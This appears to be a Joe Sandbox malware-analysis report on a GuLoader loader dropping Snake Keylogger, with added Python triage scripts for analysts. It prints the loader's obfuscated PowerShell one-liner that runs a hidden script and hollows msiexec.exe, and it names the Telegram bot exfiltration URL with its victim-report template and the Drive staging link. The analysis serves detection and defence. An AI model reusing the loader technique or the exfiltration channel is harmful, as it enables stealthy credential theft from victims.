            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021F10000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021F10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021F0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB/r
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown | Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.8:49690 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49691 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Code function: 0_2_00404F90 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
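The strings carved from msiexec.exe above carry the three pieces of Snake Keylogger network behaviour an analyst wants out of a dump: the Telegram bot sendMessage URL used as the exfiltration channel (the percent-encoded text parameter is the start of the victim report, "PC Name:" and "Date"), the reallyfreegeoip.org lookup used to geolocate the victim, and the Google Drive link the loader fetched its next stage from. The Python below is an added triage example written for this page; it is not Joe Sandbox code and not the malware's. It runs over a constructed copy of a few of those strings, percent-decodes the Telegram text parameter to expose the report template, and takes the common prefix of the carved Drive file ids, because strings carved from memory carry trailing bytes from the next allocation (the "Cz" and "iz%" tails above). The category names and regexes are my own.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs

# Constructed input: a subset of the "String found in binary or memory" rows
# above for msiexec.exe (the injected Snake Keylogger stage). Category names
# and regexes are mine, not Joe Sandbox's.
SAMPLE_STRINGS = [
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a",
    "https://reallyfreegeoip.org/xml/",
    "https://reallyfreegeoip.org/xml/8.46.123.189",
    "https://reallyfreegeoip.org/xml/8.46.123.189$",
    "https://drive.google.com/uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n",
    "https://drive.google.com/uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6nCz",
    "https://drive.usercontent.google.com/download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=download",
    "https://www.google.com/images/branding/product/ico/googleg_alldp.ico",
]

# Bot API calls look like https://api.telegram.org/bot<token>/<method>?...
TELEGRAM_BOT = re.compile(r"^https://api\.telegram\.org/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)")
# Only count a geolocation lookup when an address was actually appended.
GEOIP_XML = re.compile(r"^https://reallyfreegeoip\.org/xml/(?P<ip>(?:\d{1,3}\.){3}\d{1,3})")
GDRIVE = re.compile(r"^https://drive(?:\.usercontent)?\.google\.com/(?:uc|download)\?")


def triage_strings(strings):
    """Group carved URL strings into exfil / geolocation / stage-download
    indicators and pull out the parameters an analyst needs for blocking."""
    result = {"telegram": [], "geoip_lookups": [], "drive_ids": [], "other": []}
    for s in strings:
        m = TELEGRAM_BOT.match(s)
        if m:
            # parse_qs percent-decodes values, so %0D%0A becomes a real CRLF here.
            q = parse_qs(urlsplit(s).query, keep_blank_values=True)
            result["telegram"].append({
                "token": m["token"],      # empty in this dump: filled at runtime or redacted
                "method": m["method"],
                "chat_id": q.get("chat_id", [""])[0],
                "text": q.get("text", [""])[0],
            })
            continue
        m = GEOIP_XML.match(s)
        if m:
            result["geoip_lookups"].append(m["ip"])
            continue
        if GDRIVE.match(s):
            q = parse_qs(urlsplit(s).query)
            result["drive_ids"].append(q.get("id", [""])[0])
            continue
        result["other"].append(s)
    return result


def canonical_drive_id(ids):
    """Memory-carved strings often drag in bytes from the next allocation.
    The prefix shared by every occurrence is the defensible blocklist value."""
    return os.path.commonprefix([i for i in ids if i])


def exfil_fields(text):
    """Return the field labels in the decoded report template; only the labels
    survive in the carved string, the values are filled in on the victim."""
    return [line.split(":")[0].strip() for line in text.split("\r\n") if ":" in line]


if __name__ == "__main__":
    t = triage_strings(SAMPLE_STRINGS)
    print("Telegram calls:", t["telegram"])
    print("GeoIP lookups :", sorted(set(t["geoip_lookups"])))
    print("Drive file id :", canonical_drive_id(t["drive_ids"]))
```

The geolocation lookup is worth its own indicator: the stealer queries reallyfreegeoip.org with the victim's public address before reporting, so a proxy log entry for that host from a workstation that has no business doing IP geolocation is a cheap early signal, well before the Telegram traffic appears.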

            System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Code function: 0_2_004030B8 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Code function: 0_2_00406141
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Code function: 0_2_004047CF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04519330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_086C0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_086C52C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_086C52D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_086C8778
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DBD278
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DB5370
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DBC146
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DBC738
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DBC468
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DBCA08
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DBE988
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DB3E09
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DBCFA9
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DBCCD8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DB3AA1
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DB39ED
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DB29EC
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DB69A0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DBE97C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DBF974
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DB6FC8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_02DB9DE0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_061E0448
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_061E12D0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_061E8078
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dll CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
Source: uPDwUy9ewY.exe | Static PE information: invalid certificate
Source: uPDwUy9ewY.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/19@5/6
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Code function: 0_2_00404293 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | File created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | File created: C:\Users\user\AppData\Local\Temp\nsg4C68.tmp
Source: uPDwUy9ewY.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021FA4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021FE7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021FC2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021FF4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: uPDwUy9ewY.exe | Virustotal: Detection: 72%
Source: uPDwUy9ewY.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | File read: C:\Users\user\Desktop\uPDwUy9ewY.exe
Source: unknown | Process created: C:\Users\user\Desktop\uPDwUy9ewY.exe "C:\Users\user\Desktop\uPDwUy9ewY.exe"
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
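The process chain above is the GuLoader hand-off: the sample launches powershell.exe minimized, and the one-liner reads the dropped Ainaleh.Sie file raw, slices three characters out of it at offset 8795, and dot-invokes that slice as a command with the whole file content as its argument, so the command name never appears on the command line. PowerShell then starts msiexec.exe with no arguments at all, which is the hollow host that later carries the Snake Keylogger stage (every msiexec.exe memory string above comes from that process). The Python below is an added detection and triage example written for this page, not Joe Sandbox code and not the malware's. It parses the loader command line for the file path and slice, recovers the command name from a constructed stand-in file (the real Ainaleh.Sie is not on this page, so "iex" at that offset is my assumption), and flags a script host spawning an argument-less msiexec.exe as an injection target. The event fields, the pid values (the sandbox's process indexes 0, 2 and 5) and the hollow-host list are my own.

```python
import re

# Constructed process-creation events mirroring the "Process created" rows
# above. Field names are my convention (Sysmon-like), not Joe Sandbox's.
EVENTS = [
    {"pid": 0, "ppid": None,
     "image": r"C:\Users\user\Desktop\uPDwUy9ewY.exe",
     "cmdline": r'"C:\Users\user\Desktop\uPDwUy9ewY.exe"'},
    {"pid": 2, "ppid": 0,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r'"powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw '
                 r"'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';"
                 r'$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)"')},
    {"pid": 3, "ppid": 2,
     "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 5, "ppid": 2,
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r'"C:\Windows\SysWOW64\msiexec.exe"'},
]

# The three pieces of the loader one-liner: read a file as one string, slice a
# few characters out of it, invoke that slice (via . or &) on the file content.
READ_RAW = re.compile(r"(?:gc|Get-Content|cat|type)\s+-Raw\s+'(?P<path>[^']+)'", re.I)
SUBSTRING = re.compile(r"\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)", re.I)
DOT_INVOKE = re.compile(r"[.&]\s*\$(?P<var>\w+)\s*\(\s*\$\w+\s*\)")

# Hosts this loader family is commonly seen starting empty and injecting into
# (my list, not taken from the report).
HOLLOW_HOSTS = {"msiexec.exe", "regasm.exe", "regsvcs.exe", "caspol.exe",
                "installutil.exe", "aspnet_compiler.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_loader(cmdline):
    """Return the file and slice the one-liner takes its command name from,
    or None when the command line does not have that shape."""
    r, s, d = READ_RAW.search(cmdline), SUBSTRING.search(cmdline), DOT_INVOKE.search(cmdline)
    if not (r and s and d):
        return None
    return {"script": r["path"], "offset": int(s["off"]), "length": int(s["len"]),
            "invoked_via": d["var"]}


def recover_command_name(script_text, offset, length):
    """Slice the dropped script exactly as .SubString() does (character
    offsets on the decoded text) without evaluating any of it."""
    return script_text[offset:offset + length]


def hollow_candidates(events):
    """Flag a script host spawning a hollow host with an empty argument list:
    such a child exists only to receive injected code."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if not parent or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        child = basename(e["image"])
        args = e["cmdline"].strip().strip('"')
        if child in HOLLOW_HOSTS and basename(args) == child:
            hits.append((parent["pid"], e["pid"], child))
    return hits


# Constructed stand-in for Ainaleh.Sie: the real file is not on this page, so
# "iex" at offset 8795 is my assumption about what the slice resolves to.
FAKE_SCRIPT = "#" * 8795 + "iex" + "#" * 100

if __name__ == "__main__":
    for e in EVENTS:
        info = parse_loader(e["cmdline"])
        if info:
            name = recover_command_name(FAKE_SCRIPT, info["offset"], info["length"])
            print(f"pid {e['pid']}: reads {info['script']} and runs '{name}' on its content")
    for ppid, pid, child in hollow_candidates(EVENTS):
        print(f"pid {ppid} started argument-less {child} (pid {pid}): injection target")
```

When slicing the real dropped file, decode it the way Get-Content does before applying the offset: Windows PowerShell 5.1 honours a byte-order mark and otherwise uses the system ANSI code page, and SubString counts characters of that decoded string, so a byte offset into the raw file is only correct for pure ASCII content.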
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
